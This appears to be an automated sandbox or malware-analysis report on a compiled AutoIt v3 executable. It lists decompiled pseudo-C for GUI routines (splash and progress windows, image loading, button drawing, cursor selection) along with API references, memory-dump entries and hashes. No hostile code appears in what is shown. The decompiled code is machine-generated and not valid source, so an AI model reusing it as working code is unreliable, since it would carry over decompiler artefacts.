                0x00449707
                0x00449721
                0x0044973b
                0x00449753
                0x00449758
                0x0044976e
                0x00449779
                0x0044978b
                0x00449792
                0x00449799
                0x004497a6
                0x004497bd
                0x004497c3
                0x004497cc
                0x004497cf
                0x004497d5
                0x004497d8
                0x004497da
                0x00000000
                0x004497e0
                0x004497ea
                0x00449801
                0x00449804
                0x0044980d
                0x00449812
                0x0044981e
                0x0044983e
                0x00449844
                0x00449852
                0x0044985a
                0x00449860
                0x00449860
                0x00000000
                0x00000000
                0x00000000
                0x00449758
                0x00449701

                APIs
                • DeleteObject.GDI32(?), ref: 00449528
                • DeleteObject.GDI32(?), ref: 0044953E
                • DestroyWindow.USER32(?), ref: 00449550
                • GetDesktopWindow.USER32 ref: 0044956E
                • GetWindowRect.USER32 ref: 00449575
                • SetRect.USER32 ref: 0044968B
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00449699
                • CreateWindowExW.USER32 ref: 004496D5
                • GetClientRect.USER32 ref: 004496E5
                • CreateWindowExW.USER32 ref: 00449728
                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0044974D
                • GetFileSize.KERNEL32(00000000,00000000), ref: 00449768
                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00449773
                • GlobalLock.KERNEL32 ref: 0044977C
                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0044978B
                • GlobalUnlock.KERNEL32(00000000), ref: 00449792
                • CloseHandle.KERNEL32(00000000), ref: 00449799
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004497A6
                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004729F8,00000000), ref: 004497BD
                • GlobalFree.KERNEL32 ref: 004497CF
                • CopyImage.USER32 ref: 004497FB
                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 0044981E
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00449844
                • ShowWindow.USER32(?,00000004), ref: 00449852
                • CreateWindowExW.USER32 ref: 0044989C
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004498B0
                • GetStockObject.GDI32(00000011), ref: 004498BA
                • SelectObject.GDI32(00000000,00000000), ref: 004498C2
                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004498D2
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004498DB
                • DeleteDC.GDI32(00000000), ref: 004498E5
                • _wcslen.LIBCMT ref: 00449903
                • _wcscpy.LIBCMT ref: 00449927
                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004499C8
                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004499DC
                • GetDC.USER32(00000000), ref: 004499E9
                • SelectObject.GDI32(00000000,?), ref: 004499F9
                • SelectObject.GDI32(00000000,00000007), ref: 00449A24
                • ReleaseDC.USER32 ref: 00449A2F
                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00449A4C
                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00449A5A
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                • String ID: $AutoIt v3$DISPLAY$static
                • API String ID: 4040870279-2373415609
                • Opcode ID: ae0fbc15bf17b9d564498d965657e75ae0bfff4bf015b2b40d90b7b92fda4431
                • Instruction ID: d4a0465d4fa381bba3859d467117e45e845050e229b6802b0ad416717c68e306
                • Opcode Fuzzy Hash: ae0fbc15bf17b9d564498d965657e75ae0bfff4bf015b2b40d90b7b92fda4431
                • Instruction Fuzzy Hash: 20028371A00205AFEB14DF64CD89FAE77B9FB48700F108559FA09AB291C7B4ED41CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00431746, Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00431746(intOrPtr _a4, struct HWND__** _a8) {
				signed int _v32;
				long _v36;
				struct tagRECT _v52;
				struct tagRECT _v68;
				void* _v72;
				WCHAR* _v76;
				struct HBRUSH__* _v80;
				long _v84;
				int _v88;
				long _v92;
				int _v96;
				void* _v100;
				void* __edi;
				void* __esi;
				signed int _t104;
				long _t106;
				long _t108;
				long _t111;
				void* _t113;
				WCHAR* _t127;
				struct HBRUSH__* _t160;
				signed int _t168;
				struct HWND__** _t169;
				int _t170;
				WCHAR* _t171;
				signed int _t191;
				struct HDC__* _t213;
				intOrPtr _t217;
				void* _t219;

				_t217 = _a4;
				if( *0x48751c == 0) {
					_t104 =  *(_t217 + 0x10);
					_t213 =  *(_t217 + 0x18);
					_t168 = _t104 & 0x00000006;
					_v52.right = _t104 & 0x00000010;
					_v32 = _t168;
					_v52.top.left = _t104 & 0x00000001;
					__eflags = _t168;
					if(_t168 == 0) {
						_t106 = _a8[0x12];
						__eflags = _t106 - 0xffffffff;
						if(_t106 == 0xffffffff) {
							_push(0x12);
							goto L6;
						}
					} else {
						_push(0xe);
						L6:
						_t106 = GetSysColor();
					}
					_v52.top.left = SetTextColor(_t213, _t106);
					_t108 = _a8[0x11];
					__eflags = _t108 - 0xffffffff;
					if(_t108 != 0xffffffff) {
						_v68.top.left = CreateSolidBrush(_t108);
						_t111 = _a8[0x11];
					} else {
						_v68.right.left = GetSysColorBrush(0xf);
						_t111 = GetSysColor(0xf);
					}
					_v52.right = SetBkColor(_t213, _t111);
					_t113 = SelectObject(_t213, _v72);
					__eflags = _v76;
					_v68.bottom = _t113;
					_v52.top.left =  *(_t217 + 0x1c);
					_v52.right =  *(_t217 + 0x20);
					_v52.bottom =  *(_t217 + 0x24);
					_v36 =  *(_t217 + 0x28);
					if(_v76 == 0) {
						__eflags = _v72;
						if(_v72 != 0) {
							InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
						}
						DrawFrameControl(_t213,  &(_v52.top), 4, 0x10);
					} else {
						InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
						_t160 = CreateSolidBrush(GetSysColor(0x10));
						_v68.left = _t160;
						FrameRect(_t213,  &_v52, _t160);
						DeleteObject(_v68.left);
					}
					__eflags = _v76;
					_v52.top.left =  *(_t217 + 0x1c);
					_v52.right =  *(_t217 + 0x20);
					_v52.bottom =  *(_t217 + 0x24);
					_v36 =  *(_t217 + 0x28);
					if(_v76 == 0) {
						__eflags = _v72;
						if(_v72 == 0) {
							_push(0xfffffffe);
							_push(0xfffffffe);
							_push( &(_v52.top));
						} else {
							_push(0xfffffffd);
							_push(0xfffffffd);
							_push( &(_v52.top));
						}
						InflateRect();
						_v52.top.left = _v52.top.left - 1;
						_t51 =  &(_v52.right);
						 *_t51 = _v52.right - 1;
						__eflags =  *_t51;
					} else {
						InflateRect( &(_v52.top), 0xfffffffe, 0xfffffffe);
					}
					FillRect(_t213,  &(_v52.top), _v80);
					__eflags = _v88;
					if(_v88 != 0) {
						L23:
						_v68.right.left = _v68.right.left + 2;
						_t58 =  &(_v68.bottom);
						 *_t58 = _v68.bottom + 2;
						__eflags =  *_t58;
					} else {
						__eflags = _t168;
						if(_t168 != 0) {
							goto L23;
						}
					}
					_t169 = _a8;
					_v88 = 0x105;
					__eflags = GetWindowLongW( *_t169, 0xfffffff0) & 0x00002000;
					if(__eflags == 0) {
						_v88 = 0x125;
					}
					_t65 = SendMessageW( *_t169, 0xe, 0, 0) + 1; // 0x1
					_t170 = _t65;
					_push( ~(0 | __eflags > 0x00000000) | _t170 * 0x00000002);
					_t127 = E004014F7(_t213, _t217, __eflags);
					_v76 = _t127;
					GetWindowTextW( *_a8, _t127, _t170);
					_t171 = _v76;
					DrawTextW(_t213, _t171, 0xffffffff,  &(_v68.right), _v88);
					__eflags = _v72;
					if(_v72 != 0) {
						_v52.left =  *(_t217 + 0x24);
						_t191 =  *(_t217 + 0x20) + 1;
						__eflags = _t191;
						_v52.top.left =  *(_t217 + 0x28);
						_v68.right.left =  *(_t217 + 0x1c) + 1;
						_v68.bottom = _t191;
						SetTextColor(_t213, GetSysColor(0x11));
						DrawTextW(_t213, _t171, 0xffffffff,  &_v68, _v96);
					}
					__eflags = _v84;
					if(_v84 != 0) {
						_v68.right.left =  *(_t217 + 0x1c);
						_v68.bottom =  *(_t217 + 0x20);
						_v52.left =  *(_t217 + 0x24);
						_v52.top.left =  *(_t217 + 0x28);
						_t219 = CreateSolidBrush(0);
						FrameRect(_t213,  &(_v68.top), _t219);
						DeleteObject(_t219);
						InflateRect( &_v68, 0xfffffffc, 0xfffffffc);
						DrawFocusRect(_t213,  &_v68);
					}
					_push(_t171);
					E004010FC();
					SelectObject(_t213, _v68);
					DeleteObject(_v100);
					SetTextColor(_t213, _v92);
					SetBkColor(_t213, _v84);
					return 1;
				} else {
					return E0042085C(_t217, _a8);
				}
			}
































                0x00431758
                0x0043175c
                0x00431771
                0x00431774
                0x0043177b
                0x00431784
                0x00431788
                0x0043178c
                0x00431790
                0x00431792
                0x0043179b
                0x0043179e
                0x004317a1
                0x004317a3
                0x00000000
                0x004317a3
                0x00431794
                0x00431794
                0x004317a5
                0x004317a5
                0x004317a5
                0x004317b6
                0x004317ba
                0x004317bd
                0x004317c0
                0x004317df
                0x004317e6
                0x004317c2
                0x004317cc
                0x004317d0
                0x004317d0
                0x004317f7
                0x004317fb
                0x00431801
                0x0043180c
                0x00431813
                0x0043181a
                0x0043181e
                0x00431822
                0x00431826
                0x00431864
                0x00431869
                0x00431874
                0x00431874
                0x00431884
                0x00431828
                0x00431831
                0x00431840
                0x0043184d
                0x00431851
                0x0043185c
                0x0043185c
                0x0043188a
                0x00431898
                0x0043189f
                0x004318a3
                0x004318a7
                0x004318ab
                0x004318be
                0x004318c3
                0x004318d0
                0x004318d2
                0x004318d8
                0x004318c5
                0x004318c5
                0x004318c7
                0x004318cd
                0x004318cd
                0x004318d9
                0x004318e4
                0x004318e8
                0x004318e8
                0x004318e8
                0x004318ad
                0x004318b6
                0x004318b6
                0x004318f7
                0x004318fd
                0x00431902
                0x00431908
                0x0043190d
                0x00431911
                0x00431911
                0x00431911
                0x00431904
                0x00431904
                0x00431906
                0x00000000
                0x00000000
                0x00431906
                0x00431915
                0x0043191d
                0x0043192b
                0x00431930
                0x00431932
                0x00431932
                0x00431949
                0x00431949
                0x0043195e
                0x0043195f
                0x00431969
                0x00431973
                0x0043197d
                0x0043198b
                0x00431991
                0x00431996
                0x004319a1
                0x004319a9
                0x004319a9
                0x004319ac
                0x004319b0
                0x004319b4
                0x004319c0
                0x004319d4
                0x004319d4
                0x004319da
                0x004319df
                0x004319ea
                0x004319f3
                0x004319f7
                0x004319fb
                0x00431a05
                0x00431a0e
                0x00431a15
                0x00431a24
                0x00431a30
                0x00431a30
                0x00431a36
                0x00431a37
                0x00431a45
                0x00431a50
                0x00431a5c
                0x00431a68
                0x00431a79
                0x0043175e
                0x0043176e
                0x0043176e

                APIs
                • GetSysColor.USER32(00000012), ref: 004317A5
                • SetTextColor.GDI32(?,?), ref: 004317AD
                • GetSysColorBrush.USER32(0000000F), ref: 004317C4
                • GetSysColor.USER32(0000000F), ref: 004317D0
                • SetBkColor.GDI32(?,?), ref: 004317EB
                • SelectObject.GDI32(?,?), ref: 004317FB
                • InflateRect.USER32(?,000000FF,000000FF), ref: 00431831
                • GetSysColor.USER32(00000010), ref: 00431839
                • CreateSolidBrush.GDI32(00000000), ref: 00431840
                • FrameRect.USER32 ref: 00431851
                • DeleteObject.GDI32(?), ref: 0043185C
                • InflateRect.USER32(?,000000FE,000000FE), ref: 004318B6
                • FillRect.USER32 ref: 004318F7
                  • Part of subcall function 0042085C: GetSysColor.USER32(0000000E), ref: 00420880
                  • Part of subcall function 0042085C: SetTextColor.GDI32(?,00000000), ref: 00420888
                  • Part of subcall function 0042085C: GetSysColorBrush.USER32(0000000F), ref: 004208BB
                  • Part of subcall function 0042085C: GetSysColor.USER32(0000000F), ref: 004208C6
                  • Part of subcall function 0042085C: GetSysColor.USER32(00000011), ref: 004208E6
                  • Part of subcall function 0042085C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004208F8
                  • Part of subcall function 0042085C: SelectObject.GDI32(?,00000000), ref: 00420909
                  • Part of subcall function 0042085C: SetBkColor.GDI32(?,?), ref: 00420913
                  • Part of subcall function 0042085C: SelectObject.GDI32(?,?), ref: 00420921
                  • Part of subcall function 0042085C: InflateRect.USER32(?,000000FF,000000FF), ref: 00420946
                  • Part of subcall function 0042085C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00420961
                  • Part of subcall function 0042085C: GetWindowLongW.USER32(?,000000F0), ref: 00420976
                  • Part of subcall function 0042085C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00420996
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                • String ID:
                • API String ID: 69173610-0
                • Opcode ID: 9c6fd34123d903e9244659616457945ecc0f4c4541dc0edc53f292c162637772
                • Instruction ID: 0596952ca2a31e29a288620f92e8218bf9a71f11a91a738376b034a6c3915bbd
                • Opcode Fuzzy Hash: 9c6fd34123d903e9244659616457945ecc0f4c4541dc0edc53f292c162637772
                • Instruction Fuzzy Hash: EDB15C71508300AFD314DF64DD88E6BB7F8FB88720F505A2EF59A822A0D774E885CB56
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004490AA, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E004490AA(signed int __eax, void* __eflags, int _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				struct tagRECT _v24;
				long _v28;
				WCHAR* _v44;
				short _v176;
				void* __esi;
				signed int _t67;
				struct HWND__* _t69;
				struct HWND__* _t77;
				struct HWND__* _t102;
				signed int _t115;
				signed int _t119;
				signed char _t122;
				signed char _t123;
				signed char _t124;
				int _t134;
				signed int _t136;
				signed int _t137;
				intOrPtr _t160;
				long _t177;
				intOrPtr _t182;
				long _t183;
				struct HDC__* _t184;

				_t134 = _a4;
				_t67 = __eax | 0xffffffff;
				_t136 =  &_v44;
				_v8 = _t67;
				_a4 = _t67;
				_t177 = 0x88c00000;
				_v28 = 8;
				E003FBEC0(_t136, __eflags);
				_t69 =  *0x487510;
				if(_t69 != 0) {
					DestroyWindow(_t69);
					 *0x487510 = 0;
				}
				if(_a12 != 1) {
					_t182 = _a8;
					__eflags = _t182 - 3;
					if(_t182 >= 3) {
						E003FDE00( &_v44, E00443360( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + 8))));
						_t182 = _a8;
					}
					__eflags = _t182 - 4;
					if(_t182 >= 4) {
						_t136 =  *( *((intOrPtr*)(_t134 + 4)) + 0xc);
						_v8 = E003FC8A0(_t136);
					}
					__eflags = _t182 - 5;
					if(_t182 >= 5) {
						_t160 =  *((intOrPtr*)(_t134 + 4));
						_t136 =  *(_t160 + 0x10);
						_a4 = E003FC8A0(_t136);
					}
					__eflags = _t182 - 6;
					if(_t182 >= 6) {
						_t122 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + 0x14)));
						__eflags = _t122 & 0x00000001;
						if((_t122 & 0x00000001) != 0) {
							_t177 = 0x88000000;
						}
						_t123 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + 0x14)));
						__eflags = _t123 & 0x00000002;
						if((_t123 & 0x00000002) != 0) {
							_v28 = 0;
						}
						_t160 =  *((intOrPtr*)(_t134 + 4));
						_t136 =  *(_t160 + 0x14);
						_t124 = E003FC8A0(_t136);
						__eflags = _t124 & 0x00000010;
						if((_t124 & 0x00000010) != 0) {
							_t177 = _t177 ^ 0x08000000;
							__eflags = _t177;
						}
					}
					SystemParametersInfoW(0x30, 0,  &_v24, 0);
					_t137 = _t136 | 0xffffffff;
					__eflags = _v8 - _t137;
					if(_v8 == _t137) {
						asm("cdq");
						_t119 = _v24.right + 0xfffffed4 - _t160;
						__eflags = _t119;
						_v8 = _t119 >> 1;
					}
					__eflags = _a4 - _t137;
					if(_a4 == _t137) {
						asm("cdq");
						_t115 = _v24.bottom + 0xffffff9c - _t160;
						__eflags = _t115;
						_a4 = _t115 >> 1;
					}
					SetRect( &_v24, 0, 0, 0x12c, 0x64);
					_t183 = _v28;
					AdjustWindowRectEx( &_v24, _t177, 0, _t183);
					_t77 = CreateWindowExW(_t183, L"AutoIt v3", E00443381( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4))))), _t177, _v8, _a4, _v24.right - _v24.left, _v24.bottom - _v24.top,  *0x487518, 0, 0, 0);
					 *0x487510 = _t77;
					GetClientRect(_t77,  &_v24);
					 *0x487508 = CreateWindowExW(0, L"static", E00443381( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + 4))), 0x50000000, _v24.right - _v24.left - 0x119, 4, 0x500, 0x18,  *0x487510, 0, 0, 0);
					_t184 = CreateDCW(L"DISPLAY", 0, 0, 0);
					SelectObject(_t184, GetStockObject(0x11));
					GetTextFaceW(_t184, 0x40,  &_v176);
					_t135 = GetDeviceCaps(_t184, 0x5a);
					DeleteDC(_t184);
					SendMessageW( *0x487508, 0x30, CreateFontW((0x38e38e39 * ( ~_t88 +  ~_t88 +  ~_t88 +  ~_t88 - _t135 +  ~_t88 +  ~_t88 +  ~_t88 +  ~_t88 - _t135) >> 0x20 >> 4 >> 0x1f) + (0x38e38e39 * ( ~_t88 +  ~_t88 +  ~_t88 +  ~_t88 - _t135 +  ~_t88 +  ~_t88 +  ~_t88 +  ~_t88 - _t135) >> 0x20 >> 4), 0, 0, 0, 0x258, 0, 0, 0, 1, 4, 0, 2, 0,  &_v176), 1);
					asm("cdq");
					_t102 = CreateWindowExW(0x200, L"msctls_progress32", 0, 0x50000001, _v24.right - _v24.left - 0x104 -  *0x487510 >> 1, 0x1e, 0x104, 0x14,  *0x487510, 0, 0, 0);
					 *0x48750c = _t102;
					SendMessageW(_t102, 0x401, 0, 0x640000);
					SendMessageW( *0x48750c, 0x404, 1, 0);
					 *0x487504 = CreateWindowExW(0, L"static", _v44, 0x50000000, _v24.right - _v24.left - 0x118, 0x37, 0x500, 0x32,  *0x487510, 0, 0, 0);
					SendMessageW( *0x487504, 0x30, GetStockObject(0x11), 1);
					ShowWindow( *0x487510, 4);
					E003F2480( &_v44);
					__eflags = 0;
					return 0;
				} else {
					E003F2480( &_v44);
					return 0;
				}
			}


























                0x004490b4
                0x004490b7
                0x004490bb
                0x004490be
                0x004490c1
                0x004490c4
                0x004490c9
                0x004490d0
                0x004490d5
                0x004490dc
                0x004490df
                0x004490e5
                0x004490e5
                0x004490f3
                0x00449108
                0x0044910b
                0x0044910e
                0x00449120
                0x00449125
                0x00449125
                0x00449128
                0x0044912b
                0x00449130
                0x00449138
                0x00449138
                0x0044913b
                0x0044913e
                0x00449140
                0x00449143
                0x0044914b
                0x0044914b
                0x0044914e
                0x00449151
                0x00449159
                0x0044915e
                0x00449160
                0x00449162
                0x00449162
                0x0044916d
                0x00449172
                0x00449174
                0x00449176
                0x00449176
                0x0044917d
                0x00449180
                0x00449183
                0x00449188
                0x0044918a
                0x0044918c
                0x0044918c
                0x0044918c
                0x0044918a
                0x0044919c
                0x004491a2
                0x004491a5
                0x004491a8
                0x004491b2
                0x004491b3
                0x004491b3
                0x004491b7
                0x004491b7
                0x004491ba
                0x004491bd
                0x004491c5
                0x004491c6
                0x004491c6
                0x004491ca
                0x004491ca
                0x004491dc
                0x004491e2
                0x004491ed
                0x0044922f
                0x00449236
                0x0044923b
                0x0044928a
                0x00449297
                0x004492a1
                0x004492b1
                0x004492c1
                0x004492c3
                0x00449321
                0x00449342
                0x0044935b
                0x0044936a
                0x0044936f
                0x00449380
                0x004493bb
                0x004493d0
                0x004493db
                0x004493e4
                0x004493eb
                0x004493f1
                0x004490f5
                0x004490f8
                0x00449104
                0x00449104

                APIs
                • DestroyWindow.USER32(?), ref: 004490DF
                • SystemParametersInfoW.USER32 ref: 0044919C
                • SetRect.USER32 ref: 004491DC
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004491ED
                • CreateWindowExW.USER32 ref: 0044922F
                • GetClientRect.USER32 ref: 0044923B
                • CreateWindowExW.USER32 ref: 0044927D
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0044928F
                • GetStockObject.GDI32(00000011), ref: 00449299
                • SelectObject.GDI32(00000000,00000000), ref: 004492A1
                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004492B1
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004492BA
                • DeleteDC.GDI32(00000000), ref: 004492C3
                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00449309
                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00449321
                • CreateWindowExW.USER32 ref: 0044935B
                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0044936F
                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00449380
                • CreateWindowExW.USER32 ref: 004493B5
                • GetStockObject.GDI32(00000011), ref: 004493C0
                • SendMessageW.USER32(?,00000030,00000000), ref: 004493D0
                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004493DB
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                • API String ID: 2910397461-517079104
                • Opcode ID: e5c18ba1b66e09dfdb581a96d18cee9585bc4aa04f0765c20c6c7636c647ade3
                • Instruction ID: 3d83fb1d13ead66254dd67ed12a9df1318b787f6da045e6d57d5e8c0da1f7e64
                • Opcode Fuzzy Hash: e5c18ba1b66e09dfdb581a96d18cee9585bc4aa04f0765c20c6c7636c647ade3
                • Instruction Fuzzy Hash: 12A17171A40205BFFB14DF64DD9AFAE7769EB44701F208519FB05AB2D0D6B0AD40CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004206A4, Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004206A4(signed int _a4) {
				signed int _t4;

				_t4 = _a4;
				if(_t4 > 0x10) {
					L16:
					return SetCursor(LoadCursorW(0, 0x7f00));
				} else {
					switch( *((intOrPtr*)(_t4 * 4 +  &M00420818))) {
						case 0:
							return SetCursor(LoadCursorW(0, 0x7f89));
							goto L17;
						case 1:
							__eax = LoadCursorW(0, 0x7f8a);
							return __eax;
							goto L17;
						case 2:
							goto L16;
						case 3:
							__eax = LoadCursorW(0, 0x7f03);
							return __eax;
							goto L17;
						case 4:
							__eax = LoadCursorW(0, 0x7f8b);
							return __eax;
							goto L17;
						case 5:
							__eax = LoadCursorW(0, 0x7f01);
							return __eax;
							goto L17;
						case 6:
							__eax = LoadCursorW(0, 0x7f88);
							return __eax;
							goto L17;
						case 7:
							__eax = LoadCursorW(0, 0x7f86);
							return __eax;
							goto L17;
						case 8:
							__eax = LoadCursorW(0, 0x7f83);
							return __eax;
							goto L17;
						case 9:
							__eax = LoadCursorW(0, 0x7f85);
							return __eax;
							goto L17;
						case 0xa:
							__eax = LoadCursorW(0, 0x7f82);
							return __eax;
							goto L17;
						case 0xb:
							__eax = LoadCursorW(0, 0x7f84);
							return __eax;
							goto L17;
						case 0xc:
							__eax = LoadCursorW(0, 0x7f04);
							return __eax;
							goto L17;
						case 0xd:
							__eax = LoadCursorW(0, 0x7f02);
							return __eax;
							goto L17;
						case 0xe:
							return SetCursor(0);
							goto L17;
					}
				}
				L17:
			}




                0x004206a7
                0x004206ad
                0x004207fe
                0x00420813
                0x004206b3
                0x004206b3
                0x00000000
                0x004206cf
                0x00000000
                0x00000000
                0x004206d9
                0x004206e7
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004206f1
                0x004206ff
                0x00000000
                0x00000000
                0x00420709
                0x00420717
                0x00000000
                0x00000000
                0x00420721
                0x0042072f
                0x00000000
                0x00000000
                0x00420739
                0x00420747
                0x00000000
                0x00000000
                0x00420751
                0x0042075f
                0x00000000
                0x00000000
                0x00420769
                0x00420777
                0x00000000
                0x00000000
                0x00420781
                0x0042078f
                0x00000000
                0x00000000
                0x00420799
                0x004207a7
                0x00000000
                0x00000000
                0x004207b1
                0x004207bf
                0x00000000
                0x00000000
                0x004207c9
                0x004207d7
                0x00000000
                0x00000000
                0x004207e1
                0x004207ef
                0x00000000
                0x00000000
                0x004207fb
                0x00000000
                0x00000000
                0x004206b3
                0x00000000

                APIs
                • LoadCursorW.USER32(00000000,00007F89), ref: 004206C1
                • SetCursor.USER32(00000000), ref: 004206C8
                • LoadCursorW.USER32(00000000,00007F8A), ref: 004206D9
                • SetCursor.USER32(00000000), ref: 004206E0
                • LoadCursorW.USER32(00000000,00007F03), ref: 004206F1
                • SetCursor.USER32(00000000), ref: 004206F8
                • LoadCursorW.USER32(00000000,00007F8B), ref: 00420709
                • SetCursor.USER32(00000000), ref: 00420710
                • LoadCursorW.USER32(00000000,00007F01), ref: 00420721
                • SetCursor.USER32(00000000), ref: 00420728
                • LoadCursorW.USER32(00000000,00007F88), ref: 00420739
                • SetCursor.USER32(00000000), ref: 00420740
                • LoadCursorW.USER32(00000000,00007F86), ref: 00420751
                • SetCursor.USER32(00000000), ref: 00420758
                • LoadCursorW.USER32(00000000,00007F83), ref: 00420769
                • SetCursor.USER32(00000000), ref: 00420770
                • LoadCursorW.USER32(00000000,00007F85), ref: 00420781
                • SetCursor.USER32(00000000), ref: 00420788
                • LoadCursorW.USER32(00000000,00007F82), ref: 00420799
                • SetCursor.USER32(00000000), ref: 004207A0
                • LoadCursorW.USER32(00000000,00007F84), ref: 004207B1
                • SetCursor.USER32(00000000), ref: 004207B8
                • LoadCursorW.USER32(00000000,00007F04), ref: 004207C9
                • SetCursor.USER32(00000000), ref: 004207D0
                • LoadCursorW.USER32(00000000,00007F02), ref: 004207E1
                • SetCursor.USER32(00000000), ref: 004207E8
                • SetCursor.USER32(00000000), ref: 004207F4
                • LoadCursorW.USER32(00000000,00007F00), ref: 00420805
                • SetCursor.USER32(00000000), ref: 0042080C
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Cursor$Load
                • String ID:
                • API String ID: 1675784387-0
                • Opcode ID: 4e9b87dee43c06cbb3df9c1248ac0cbd69f9d630d7977fef8bee4bbdabd24e7c
